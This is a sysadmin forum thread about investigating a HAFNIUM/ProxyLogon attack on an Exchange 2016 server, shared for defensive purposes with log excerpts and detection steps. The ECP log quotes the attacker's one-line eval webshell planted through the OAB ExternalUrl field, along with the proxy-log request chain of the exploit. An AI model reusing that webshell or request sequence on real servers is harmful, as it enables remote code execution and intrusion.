Exchange 2016 - HAFNIUM incident investigation

latal · 2021-03-14T12:50:47.000Z

Hi Spiceheads,

As you know, we’re facing HAFNIUM 0-day exploits:
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/

Even If you installed the patch, your servers can be vulnerable. You can check via script:

github.com

//github.com/microsoft/CSS-Exchange/tree/main/Security

As I know, If you’re compromised, the only solution is to rebuild Exchange and reset all users’s passwords.

And now (12.3.), first wave of ransomware began:

twitter.com

Microsoft Threat Intelligence

@MsftSecIntel

We have detected and are now blocking a new family of ransomware being used after an initial compromise of unpatched on-premises Exchange Servers. Microsoft protects against this threat known as Ransom:Win32/DoejoCrypt.A, and also as DearCry.

4:53 AM - 12 Mar 2021 1.2K 770

Don’t want to repeat all the general stuff, but want to describe our experience. We use Exchange 2016 CU19 (single box, all roles on it), it’s exposed to the internet. We installed KB5000871 on Saturday, 6th of March.

As Microsoft recommedns, we run Test-ProxyLogon.ps1 and found>
[cve-2021-26855] suspicious activity found in http proxy log!
and
[cve-2021-27065] suspicious activity found in ecp logs!

We found 2 incidents, both before KB5000871 has been installed.

In both cases the attack has the same scenario:

ECPServer20210304-1.log:
2021-03-04T09:38:24.923Z,EXCH2016,ECP.Request,“S:TIME=1629;S:SID=f7f182a9-e307-450a-a6aa-90c7a5c0f5c3;‘S:CMD=Set-OabVirtualDirectory.ExternalUrl=‘‘http://f/<script language=““JScript”” runat=““server””>function Page_Load(){eval(Request[““gttkomomo””],““unsafe””);}’’.Identity=’‘4e271dc0-9efc-400b-8e3d-bbaa53b3192c’‘’;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=VsLBflD3nUKwLG0ebfYyJFl5TIiD4NgIZq732MG4v0gumpYSpPqcwY10thXmHbSUUkWRXXga4Gc.&schema=OABVirtualDirectory;S:REFERRER=;S:EX=;S:ACTID=625aae9c-dc7f-4acc-9a63-8e27956b17d7;S:RS=0;S:BLD=15.1.1591.10;S:TNAME=;S:TID=;S:USID=6c29c405-598a-4600-bec9-5417fdb1e331;S:EDOID=;S:ACID=”
2021-03-04T09:38:25.002Z,EXCH2016,ECP.Request,S:TIME=78;S:SID=f7f182a9-e307-450a-a6aa-90c7a5c0f5c3;‘S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true.Identity=’‘4e271dc0-9efc-400b-8e3d-bbaa53b3192c’‘’;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=VsLBflD3nUKwLG0ebfYyJFl5TIiD4NgIZq732MG4v0gumpYSpPqcwY10thXmHbSUUkWRXXga4Gc.&schema=OABVirtualDirectory;S:REFERRER=;S:EX=;S:ACTID=625aae9c-dc7f-4acc-9a63-8e27956b17d7;S:RS=1;S:BLD=15.1.1591.10;S:TNAME=;S:TID=;S:USID=6c29c405-598a-4600-bec9-5417fdb1e331;S:EDOID=;S:ACID=
2021-03-04T09:38:27.969Z,EXCH2016,ECP.LongRunning,S:TIME=1620;S:SID=f7f182a9-e307-450a-a6aa-90c7a5c0f5c3;‘S:CMD=Get-OABVirtualDirectory.Identity=’‘4e271dc0-9efc-400b-8e3d-bbaa53b3192c’‘’;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=VsLBflD3nUKwLG0ebfYyJFl5TIiD4NgIZq732MG4v0gumpYSpPqcwY10thXmHbSUUkWRXXga4Gc.&schema=ResetOABVirtualDirectory;S:REFERRER=;S:EX=;S:ACTID=9c6108e1-151d-46f1-9094-ab55ea2ce95d;S:RS=1;S:BLD=15.1.1591.10;S:TNAME=;S:TID=;S:USID=6c29c405-598a-4600-bec9-5417fdb1e331;S:EDOID=;S:ACID=
2021-03-04T09:38:28.000Z,EXCH2016,ECP.Request,S:TIME=408;S:SID=f7f182a9-e307-450a-a6aa-90c7a5c0f5c3;‘S:CMD=Set-OabVirtualDirectory.ExternalUrl=$null.Identity=’‘4e271dc0-9efc-400b-8e3d-bbaa53b3192c’‘’;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=VsLBflD3nUKwLG0ebfYyJFl5TIiD4NgIZq732MG4v0gumpYSpPqcwY10thXmHbSUUkWRXXga4Gc.&schema=OABVirtualDirectory;S:REFERRER=;S:EX=;S:ACTID=cf36e309-3c1d-401b-8a1a-80713f90335b;S:RS=0;S:BLD=15.1.1591.10;S:TNAME=;S:TID=;S:USID=6c29c405-598a-4600-bec9-5417fdb1e331;S:EDOID=;S:ACID=

HTTP Proxy LOG:
DateTime: 2021-03-04T09:37:55.328Z
ClientIpAddress: 103.212.223.210
UrlHost: Your public IP
UrlStem: /ecp/y.js
RoutingHint: X-BEResource-Cookie
UserAgent: python-requests/2.25.1

AnchorMailbox, HttpStatus:
ServerInfo~a]@EXCH2016.domain.local:444/mapi/emsmdb/?# 200
ServerInfo~a]@EXCH2016.domain.local:444/ecp/proxyLogon.ecp?# 241
ServerInfo~a]@EXCH2016.domain.local:444/ecp/DDI/DDIService.svc/GetObject?msExchEcpCanary=VsLBflD3nUKwLG0ebfYyJFl5TIiD4NgIZq732MG4v0gumpYSpPqcwY10thXmHbSUUkWRXXga5Gc.&schema=OABVirtualDirectory# 200
ServerInfo~a]@EXCH2016.domain.local:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=VsLBflD3nUKwLG0ebfYyJFl5TIiD4NgIZq732MG4v0gumpYSpPqcwY10thXmHbSUUkWRXXga5Gc.&schema=OABVirtualDirectory# 200
ServerInfo~a]@EXCH2016.domain.local:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=VsLBflD3nUKwLG0ebfYyJFl5TIiD4NgIZq732MG4v0gumpYSpPqcwY10thXmHbSUUkWRXXga5Gc.&schema=ResetOABVirtualDirectory# 200

So we tried to find a webshell, but fortunately we found it only in ESET:

Antivirus.png800×202 62.7 KB

To be sure, we run CompareExchangeHashes.ps1 and MSERT. Clean in both cases.

Microsoft Safety Scanner:

So many thanks to ESET guys!!!

As I think, we were saved by ESET.

ivan-wang · 2021-03-15T05:29:18.000Z

Thanks for your sharing!

rj0 · 2021-03-16T19:53:16.000Z

Ugh I can almost feel the blood draining out of my body if that was my server. Thankfully we came back clean on all fronts. I was following along in reddit as well of some of the horror stories there. One thread I read the engineer was only given a maintenance window 3 weeks out by the head of IT Good luck with that

What did you do post remediation? Users change PWs or anything like that as a precaution